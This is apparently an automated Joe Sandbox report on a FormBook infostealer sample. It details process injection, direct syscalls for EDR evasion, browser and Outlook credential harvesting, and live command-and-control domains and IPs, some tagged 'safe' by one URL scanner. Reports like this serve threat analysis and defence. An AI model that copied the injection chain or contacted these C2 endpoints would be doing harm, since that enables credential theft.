                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\powercfg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\powercfg.exeThread register set: target process: 7928Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\powercfg.exeThread APC queued: target process: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3131008Jump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C98C93 LogonUserW,0_2_00C98C93
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C43B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C43B4C
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C44A35
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA4EC9 mouse_event,0_2_00CA4EC9
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Project Breakdown Doc.exe"Jump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C981F7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00CA4C03
                Source: Project Breakdown Doc.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Project Breakdown Doc.exe, VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: VFfhzkOtKq.exe, 00000005.00000002.2936459498.00000000013B0000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000005.00000000.2174810905.00000000013B1000.00000002.00000001.00040000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2936718603.0000000000F70000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6886B cpuid 0_2_00C6886B
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C750D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C750D7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C82230 GetUserNameW,0_2_00C82230
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C7418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00C7418A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C44AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C44AFE

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\powercfg.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Project Breakdown Doc.exeBinary or memory string: WIN_81
                Source: Project Breakdown Doc.exeBinary or memory string: WIN_XP
                Source: Project Breakdown Doc.exeBinary or memory string: WIN_XPe
                Source: Project Breakdown Doc.exeBinary or memory string: WIN_VISTA
                Source: Project Breakdown Doc.exeBinary or memory string: WIN_7
                Source: Project Breakdown Doc.exeBinary or memory string: WIN_8
                Source: Project Breakdown Doc.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00CB6596
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00CB6A5A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560859 Sample: Project Breakdown Doc.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 28 www.wine-drinkers.club 2->28 30 www.supernutra01.online 2->30 32 3 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 48 5 other signatures 2->48 10 Project Breakdown Doc.exe 2 2->10         started        signatures3 process4 signatures5 60 Binary is likely a compiled AutoIt script file 10->60 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 VFfhzkOtKq.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 powercfg.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 VFfhzkOtKq.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.1secondlending.one 43.205.198.29, 49808, 49815, 49821 LILLY-ASUS Japan 22->34 36 www.wine-drinkers.club 194.245.148.189, 49882, 49888, 49899 CSLDE Germany 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Project Breakdown Doc.exe53%ReversingLabsWin32.Trojan.Znyonm
                Project Breakdown Doc.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.1secondlending.one/6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflN0%Avira URL Cloudsafe
                http://www.wine-drinkers.club0%Avira URL Cloudsafe
                http://www.qqa79.top/mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8=0%Avira URL Cloudsafe
                http://www.supernutra01.online/rk61/0%Avira URL Cloudsafe
                http://www.wine-drinkers.club/hakt/0%Avira URL Cloudsafe
                http://www.supernutra01.online/rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw=0%Avira URL Cloudsafe
                http://www.1secondlending.one/6pwo/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                qqa79.top
                		38.47.233.21
                		truefalse
                  		unknown
                  www.supernutra01.online
                  		172.67.220.36
                  		truetrue
                    		unknown
                    www.1secondlending.one
                    		43.205.198.29
                    		truetrue
                      		unknown
                      www.wine-drinkers.club
                      		194.245.148.189
                      		truetrue
                        		unknown
                        www.qqa79.top
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.1secondlending.one/6pwo/?AFF=OcYLCa3XOMtt+RsgzD1zLQYXF21NRX3aDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abnTc9bVWqvwMitNejIQMZs4A8D92e/CCvcvI=&qjBT=BfTHe4BP_zkdflNtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.qqa79.top/mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8=false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.wine-drinkers.club/hakt/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.supernutra01.online/rk61/?qjBT=BfTHe4BP_zkdflN&AFF=4Jev6jkxg6xEO7Dapp2OtVT6jS0ALsNacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9NGZN+wjn/QV3LQCc1WVNeTcwGOVDWPFPiYw=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.supernutra01.online/rk61/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.1secondlending.one/6pwo/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabpowercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icopowercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://kb.fastpanel.direct/troubleshoot/powercfg.exe, 00000006.00000002.2937780821.0000000004408000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000006.00000002.2939443430.0000000006790000.00000004.00000800.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.0000000002F78000.00000004.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpowercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.wine-drinkers.clubVFfhzkOtKq.exe, 00000007.00000002.2938680835.0000000004CFA000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.ecosia.org/newtab/powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              38.47.233.21
                                              		qqa79.topUnited States
                                              		174COGENT-174USfalse
                                              43.205.198.29
                                              		www.1secondlending.oneJapan4249LILLY-ASUStrue
                                              194.245.148.189
                                              		www.wine-drinkers.clubGermany
                                              		5517CSLDEtrue
                                              172.67.220.36
                                              		www.supernutra01.onlineUnited States
                                              		13335CLOUDFLARENETUStrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1560859
                                              Start date and time:2024-11-22 12:40:07 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 51s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:8
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Project Breakdown Doc.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@4/4
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 46
                                              • Number of non-executed functions: 276
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • VT rate limit hit for: Project Breakdown Doc.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:42:34API Interceptor10297x Sleep call for process: powercfg.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              43.205.198.29CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                194.245.148.189A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                • www.maitreyatoys.world/dvmh/
                                                Jjfmcz1Hsz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.apidachicago.org/nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX
                                                Aposporogony.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.apidachicago.org/nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD
                                                Trubaduren.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.apidachicago.org/nqhc/?yDH=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&mZcHl=r4SlwD8
